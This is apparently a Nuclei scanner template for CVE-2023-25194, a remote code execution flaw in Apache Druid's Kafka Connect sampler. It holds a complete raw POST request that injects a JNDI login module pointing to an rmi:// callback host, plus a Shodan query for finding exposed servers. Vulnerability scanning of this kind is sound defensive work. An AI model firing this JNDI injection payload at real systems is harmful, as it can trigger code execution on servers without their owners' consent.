nuclei-templates/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml

id: CVE-2023-25194

info:
  name: Apache Druid Kafka Connect - Remote Code Execution
  author: j4vaovo
  severity: high
  description: |
    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API    
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
  metadata:
    max-request: 1
    shodan-query: html:"Apache Druid"
    verified: true
  tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "type":"kafka",
            "spec":{
                "type":"kafka",
                "ioConfig":{
                    "type":"kafka",
                    "consumerProperties":{
                        "bootstrap.servers":"127.0.0.1:6666",
                        "sasl.mechanism":"SCRAM-SHA-256",
                        "security.protocol":"SASL_SSL",
                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                    },
                    "topic":"test",
                    "useEarliestOffset":true,
                    "inputFormat":{
                        "type":"regex",
                        "pattern":"([\\s\\S]*)",
                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                        "columns":[
                            "raw"
                        ]
                    }
                },
                "dataSchema":{
                    "dataSource":"sample",
                    "timestampSpec":{
                        "column":"!!!_no_such_column_!!!",
                        "missingValue":"1970-01-01T00:00:00Z"
                    },
                    "dimensionsSpec":{

                    },
                    "granularitySpec":{
                        "rollup":false
                    }
                },
                "tuningConfig":{
                    "type":"kafka"
                }
            },
            "samplerConfig":{
                "numRows":500,
                "timeoutMs":15000
            }
        }        

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'RecordSupplier'

      - type: status
        status:
          - 400